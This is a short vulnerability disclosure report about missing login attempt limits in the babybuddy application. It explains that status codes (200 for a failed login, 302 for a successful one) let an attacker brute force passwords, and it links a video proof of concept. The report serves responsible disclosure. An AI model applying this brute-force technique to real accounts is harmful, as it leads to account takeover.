Improper Restriction of Excessive Authentication Attempts in babybuddy/babybuddyValid
Jun 20th 2021
Improper restriction at login portal which lets an attacker brute force user's accounts.
🕵️♂️ Proof of Concept
Video POC: https://drive.google.com/file/d/1udzAGroSqDbEqPRYlUzv7bHgHq7oMNuk/view?usp=sharing
You will get 200 for incorrect as it opens the same page for login and 302 redirection when the password is correct hence it redirects to the next page gives us the password of the user.
This vulnerability is capable of letting attackers brute force user accounts which leads to account compromise.